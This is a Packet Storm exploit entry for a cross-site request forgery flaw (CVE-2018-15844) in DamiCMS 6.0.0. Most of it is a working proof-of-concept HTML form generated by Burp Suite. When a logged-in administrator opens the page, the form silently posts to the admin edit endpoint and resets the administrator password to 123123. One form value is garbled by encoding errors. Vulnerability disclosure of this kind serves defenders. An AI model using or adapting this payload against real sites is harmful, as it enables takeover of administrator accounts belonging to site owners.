DamiCMS 6.0.0 Cross Site Request Forgery

2018-08-31T00:00:00
ID PACKETSTORM:149187
Type packetstorm
Reporter Autism_JH
Modified 2018-08-31T00:00:00

Description

                                        
                                            `# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)  
# Author: Autism_JH  
# Date: 2018-08-30  
# Vendor Homepage: https://github.com/731276192/damicms  
# Software Link: https://github.com/731276192/damicms  
# Version: 6.0.0  
# CVE: CVE-2018-15844  
  
# Description:  
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.  
# After the administrator login in,open the poc,the administrator account's   
# password will been changed to 123123  
  
# POC:  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">  
<input type="hidden" name="username" value="admin" />  
<input type="hidden" name="password" value="123123" />  
<input type="hidden" name="role_id" value="1" />  
<input type="hidden" name="id" value="1" />  
<input type="hidden" name="Submit" value="ASS¡®AY=®šA$?¿®A|”¹" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`